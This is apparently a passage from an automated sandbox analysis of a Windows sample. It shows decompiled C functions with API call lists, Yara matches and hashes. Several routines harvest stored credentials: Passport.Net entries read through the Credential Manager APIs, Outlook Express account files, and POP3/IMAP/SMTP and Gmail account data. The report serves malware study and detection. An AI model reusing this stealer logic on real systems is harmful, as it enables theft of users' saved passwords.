                                                                                						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                                                							_v320 = 0;
                                                                                							memset( &_v319, 0, 0xff);
                                                                                							_t97 = _t97 + 0xc;
                                                                                							_v52 =  &_v320;
                                                                                							_v64 = 4;
                                                                                							_v48 = 0xff;
                                                                                							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
                                                                                								_push(_v16);
                                                                                								_push(0);
                                                                                								_push(_v12);
                                                                                								_t84 = 5;
                                                                                								_t74 = E0040496E( &_v320, _t84);
                                                                                								_t95 = _t94 + _v28;
                                                                                								_t91 =  *_t95;
                                                                                								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
                                                                                								_t97 = _t97 + 0x18;
                                                                                								if(_t91 == 0) {
                                                                                									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_v16 = _v16 + 1;
                                                                                						_t66 = _v32;
                                                                                						_v24 = _v24 + 0x14;
                                                                                					} while (_v16 < _t66);
                                                                                					_v20 = _v20 + 1;
                                                                                				} while (_v20 < _t66);
                                                                                				goto L10;
                                                                                			}





























                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                • String ID:
                                                                                • API String ID: 4281309102-0
                                                                                • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                                • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E0040D5DB(char* __ebx, void* __eflags) {
                                                                                				char _v8;
                                                                                				short* _v12;
                                                                                				int _v16;
                                                                                				intOrPtr _v20;
                                                                                				char _v24;
                                                                                				intOrPtr _v28;
                                                                                				char _v32;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				int _v56;
                                                                                				char _v60;
                                                                                				char _v584;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t36;
                                                                                				intOrPtr _t44;
                                                                                				void* _t47;
                                                                                				char _t63;
                                                                                				int _t69;
                                                                                				void* _t74;
                                                                                
                                                                                				_t74 = __eflags;
                                                                                				_t69 = 0;
                                                                                				E004046D7( &_v584);
                                                                                				_v60 = 0;
                                                                                				_v56 = 0;
                                                                                				_t36 = E00404647( &_v60, 0, _t74);
                                                                                				_t75 = _t36;
                                                                                				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
                                                                                					_push( &_v8);
                                                                                					_push(0);
                                                                                					_push(4);
                                                                                					_push("Passport.Net\\*");
                                                                                					if(_v52() != 0) {
                                                                                						_t44 = _v8;
                                                                                						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
                                                                                							_v32 =  *((intOrPtr*)(_t44 + 0x18));
                                                                                							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
                                                                                							_t47 = 0;
                                                                                							_t63 = 0x4a;
                                                                                							do {
                                                                                								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
                                                                                								 *(_t47 + 0x417768) =  *_t14 << 2;
                                                                                								_t47 = _t47 + 2;
                                                                                							} while (_t47 < _t63);
                                                                                							_v24 = _t63;
                                                                                							_v20 = 0x417768;
                                                                                							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
                                                                                								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
                                                                                									strcpy(__ebx,  *(_v8 + 0x30));
                                                                                									_t69 = 1;
                                                                                								}
                                                                                								LocalFree(_v12);
                                                                                							}
                                                                                							_t44 = _v8;
                                                                                						}
                                                                                						_v48(_t44);
                                                                                					}
                                                                                				}
                                                                                				E004046C2( &_v60);
                                                                                				E004047F1( &_v584);
                                                                                				return _t69;
                                                                                			}
























                                                                                APIs
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                  • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                                  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                • strlen.MSVCRT ref: 0040D6B7
                                                                                • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                • String ID: Passport.Net\*$hwA
                                                                                • API String ID: 3335197805-2625321100
                                                                                • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                                • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 41%
                                                                                			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                                                                				int _v0;
                                                                                				int _t26;
                                                                                				char* _t32;
                                                                                				int _t44;
                                                                                				signed int _t46;
                                                                                				signed int _t47;
                                                                                
                                                                                				_t38 = __ecx;
                                                                                				_t47 = _t46 & 0xfffffff8;
                                                                                				E004118A0(0x1040, __ecx);
                                                                                				_t26 = GetMenuItemCount(_a8);
                                                                                				_t44 = 0;
                                                                                				_v0 = _t26;
                                                                                				if(_t26 <= 0) {
                                                                                					L13:
                                                                                					return _t26;
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					memset( &_a53, 0, 0x1000);
                                                                                					_t47 = _t47 + 0xc;
                                                                                					_a40 =  &_a52;
                                                                                					_a4.cbSize = 0x30;
                                                                                					_a8 = 0x36;
                                                                                					_a44 = 0x1000;
                                                                                					_a20 = 0;
                                                                                					_a52 = 0;
                                                                                					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
                                                                                					if(_t26 == 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					if(_a52 == 0) {
                                                                                						L10:
                                                                                						_t55 = _a24;
                                                                                						if(_a24 != 0) {
                                                                                							_push(0);
                                                                                							_push(_a24);
                                                                                							_push(_a4.cbSize);
                                                                                							_t26 = E00407EFB(_t38, _t55);
                                                                                							_t47 = _t47 + 0xc;
                                                                                						}
                                                                                						goto L12;
                                                                                					}
                                                                                					_t32 = strchr( &_a52, 9);
                                                                                					if(_t32 != 0) {
                                                                                						 *_t32 = 0;
                                                                                					}
                                                                                					_t33 = _a20;
                                                                                					if(_a24 != 0) {
                                                                                						if(_a12 == 0) {
                                                                                							 *0x4171b4 =  *0x4171b4 + 1;
                                                                                							_t33 =  *0x4171b4 + 0x11558;
                                                                                							__eflags =  *0x4171b4 + 0x11558;
                                                                                						} else {
                                                                                							_t18 = _t44 + 0x11171; // 0x11171
                                                                                							_t33 = _t18;
                                                                                						}
                                                                                					}
                                                                                					_t26 = E00407EC3(_t33,  &_a52);
                                                                                					_pop(_t38);
                                                                                					goto L10;
                                                                                					L12:
                                                                                					_t44 = _t44 + 1;
                                                                                				} while (_t44 < _v0);
                                                                                				goto L13;
                                                                                			}










                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2300387033-3849865405
                                                                                • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                                • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 66%
                                                                                			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v280;
                                                                                				char _v408;
                                                                                				intOrPtr _v412;
                                                                                				char _v668;
                                                                                				char _v796;
                                                                                				intOrPtr _v800;
                                                                                				char _v928;
                                                                                				char _v940;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t37;
                                                                                				void* _t44;
                                                                                				intOrPtr _t50;
                                                                                				void* _t56;
                                                                                				intOrPtr _t58;
                                                                                				void* _t63;
                                                                                
                                                                                				_t63 = __fp0;
                                                                                				_t50 = __ecx;
                                                                                				_v8 = __ecx;
                                                                                				E004021D8( &_v940);
                                                                                				_t58 = _a4;
                                                                                				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
                                                                                				_push(_t58 + 0x404);
                                                                                				_t44 = 0x7f;
                                                                                				E004060D0(_t44,  &_v796);
                                                                                				E004060D0(_t44,  &_v408, _t58 + 0x204);
                                                                                				E004060D0(_t44,  &_v928, _t58 + 4);
                                                                                				E004060D0(_t44,  &_v668, _t58 + 0x104);
                                                                                				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
                                                                                				_t56 = _t58 + 0x504;
                                                                                				_push("pop3");
                                                                                				_push(_t56);
                                                                                				L004115B2();
                                                                                				if(_t37 != 0) {
                                                                                					_push("imap");
                                                                                					_push(_t56);
                                                                                					L004115B2();
                                                                                					if(_t37 != 0) {
                                                                                						_push("smtp");
                                                                                						_push(_t56);
                                                                                						L004115B2();
                                                                                						if(_t37 == 0) {
                                                                                							_v412 = 4;
                                                                                						}
                                                                                					} else {
                                                                                						_v412 = 2;
                                                                                					}
                                                                                				} else {
                                                                                					_v412 = 1;
                                                                                				}
                                                                                				_v24 =  *((intOrPtr*)(_t58 + 0x804));
                                                                                				_v20 =  *((intOrPtr*)(_t58 + 0x808));
                                                                                				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
                                                                                			}
























                                                                                APIs
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                                • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _stricmp$memcpystrlen
                                                                                • String ID: imap$pop3$smtp
                                                                                • API String ID: 445763297-821077329
                                                                                • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                                • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                                                				char _v5;
                                                                                				char _v132;
                                                                                				char _v404;
                                                                                				char _v532;
                                                                                				intOrPtr _v536;
                                                                                				char _v920;
                                                                                				intOrPtr _v924;
                                                                                				char _v1052;
                                                                                				char _v1064;
                                                                                				void* __ebx;
                                                                                				void* _t18;
                                                                                				char* _t20;
                                                                                				char* _t39;
                                                                                				char* _t41;
                                                                                				void* _t48;
                                                                                				void* _t59;
                                                                                
                                                                                				_t59 = __fp0;
                                                                                				_t48 = __edi;
                                                                                				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
                                                                                					return _t18;
                                                                                				}
                                                                                				_t39 =  &_v132;
                                                                                				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
                                                                                				if(_t20 != 0) {
                                                                                					_v5 = 0;
                                                                                					_t20 = strchr(_t39, 0x3a);
                                                                                					_t41 = _t20;
                                                                                					if(_t41 != 0) {
                                                                                						 *_t41 = 0;
                                                                                						E004021D8( &_v1064);
                                                                                						strcpy( &_v404,  &(_t41[1]));
                                                                                						strcpy( &_v532,  &_v132);
                                                                                						_v924 = 7;
                                                                                						_v536 = 3;
                                                                                						if(strlen( &_v532) + 0xa < 0x7f) {
                                                                                							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                                                						}
                                                                                						strcpy( &_v1052,  &_v532);
                                                                                						_t20 = E00402407( &_v1064, _t59, _t48);
                                                                                					}
                                                                                				}
                                                                                				return _t20;
                                                                                			}




















                                                                                APIs
                                                                                  • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                  • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                  • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                                  • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                • strchr.MSVCRT ref: 00403706
                                                                                • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                                • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                                • strlen.MSVCRT ref: 0040375F
                                                                                • sprintf.MSVCRT ref: 00403783
                                                                                • strcpy.MSVCRT(?,?), ref: 00403799
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                • String ID: %s@gmail.com
                                                                                • API String ID: 2649369358-4097000612
                                                                                • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                                • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
                                                                                				char _v8;
                                                                                				void _v1031;
                                                                                				void _v1032;
                                                                                				void* _t26;
                                                                                				char* _t27;
                                                                                				int _t32;
                                                                                				int _t38;
                                                                                				char* _t43;
                                                                                				int _t44;
                                                                                				void* _t45;
                                                                                				void** _t48;
                                                                                				void* _t50;
                                                                                				void* _t51;
                                                                                
                                                                                				_t43 = __ebx;
                                                                                				_t44 = 0;
                                                                                				_v1032 = 0;
                                                                                				memset( &_v1031, 0, 0x3ff);
                                                                                				_t26 = _a8;
                                                                                				_t51 = _t50 + 0xc;
                                                                                				 *__ebx = 0;
                                                                                				if(_t26 > 0) {
                                                                                					_t48 = _a4 + 4;
                                                                                					_v8 = _t26;
                                                                                					do {
                                                                                						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
                                                                                						_t32 = strlen( &_v1032);
                                                                                						_a8 = _t32;
                                                                                						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
                                                                                						_t45 = _t44 + _a8 + 1;
                                                                                						_t38 = strlen( *_t48);
                                                                                						_a8 = _t38;
                                                                                						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
                                                                                						_t51 = _t51 + 0x30;
                                                                                						_t48 =  &(_t48[2]);
                                                                                						_t18 =  &_v8;
                                                                                						 *_t18 = _v8 - 1;
                                                                                						_t44 = _t45 + _a8 + 1;
                                                                                					} while ( *_t18 != 0);
                                                                                				}
                                                                                				_t27 = _t44 + _t43;
                                                                                				 *_t27 = 0;
                                                                                				 *((char*)(_t27 + 1)) = 0;
                                                                                				return _t43;
                                                                                			}

















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                • String ID: %s (%s)
                                                                                • API String ID: 3756086014-1363028141
                                                                                • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                                • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 25%
                                                                                			E0040E906(void* __ebx, int _a4, void* _a8) {
                                                                                				char _v20;
                                                                                				char _v36;
                                                                                				char _v52;
                                                                                				void* _t15;
                                                                                				void* _t17;
                                                                                				void* _t28;
                                                                                				intOrPtr* _t31;
                                                                                				int _t32;
                                                                                
                                                                                				_t28 = __ebx;
                                                                                				_t31 = __imp__UuidFromStringA;
                                                                                				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
                                                                                				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
                                                                                				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t32 = _a4;
                                                                                					if(_t32 > 0x7e) {
                                                                                						_t32 = 0x7e;
                                                                                					}
                                                                                					memcpy(_t28, _a8, _t32);
                                                                                					 *((char*)(_t28 + _t32)) = 0;
                                                                                					__imp__CoTaskMemFree(_a8);
                                                                                					return 1;
                                                                                				}
                                                                                			}












                                                                                APIs
                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                • memcpy.MSVCRT ref: 0040E966
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                Strings
                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                • API String ID: 1640410171-3316789007
                                                                                • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                                • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                				void* _t12;
                                                                                				void* _t15;
                                                                                				char* _t19;
                                                                                				void* _t25;
                                                                                				void* _t28;
                                                                                				long _t31;
                                                                                
                                                                                				_t12 = E00405ECB(_a8);
                                                                                				_a8 = _t12;
                                                                                				if(_t12 != 0xffffffff) {
                                                                                					_t31 = GetFileSize(_t12, 0);
                                                                                					_t37 = _t31 - 2;
                                                                                					if(_t31 > 2) {
                                                                                						_t3 = _t31 + 2; // 0x2
                                                                                						_t15 = _t3;
                                                                                						L004115D0();
                                                                                						_t25 = _t15;
                                                                                						_t28 = _t15;
                                                                                						SetFilePointer(_a8, 2, 0, 0);
                                                                                						_t5 = _t31 - 2; // -2
                                                                                						E004066F6(_t25, _a8, _t28, _t5);
                                                                                						_t19 = _t28 + _t31;
                                                                                						 *((char*)(_t19 - 2)) = 0;
                                                                                						 *((char*)(_t19 - 1)) = 0;
                                                                                						 *_t19 = 0;
                                                                                						E00410A8A(_t25, _t37, _a4, _t28);
                                                                                						_push(_t28);
                                                                                						L004115D6();
                                                                                					}
                                                                                					return CloseHandle(_a8);
                                                                                				}
                                                                                				return _t12;
                                                                                			}










                                                                                APIs
                                                                                  • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                                  • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                                  • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                                  • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                  • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                  • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                                                  • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                                  • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                                                • CloseHandle.KERNEL32(?), ref: 00410C37
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                • String ID: rA
                                                                                • API String ID: 1886237854-474049127
                                                                                • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                                                • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
                                                                                
                                                                                				 *__edi =  *__edi + __ecx;
                                                                                			}




                                                                                APIs
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                • SendMessageA.USER32 ref: 00409EBB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                • String ID:
                                                                                • API String ID: 3673709545-0
                                                                                • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                                • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {
                                                                                
                                                                                				 *__edi =  *__edi + __ecx;
                                                                                			}




                                                                                APIs
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                • SendMessageA.USER32 ref: 00409EBB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                • String ID:
                                                                                • API String ID: 3673709545-0
                                                                                • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
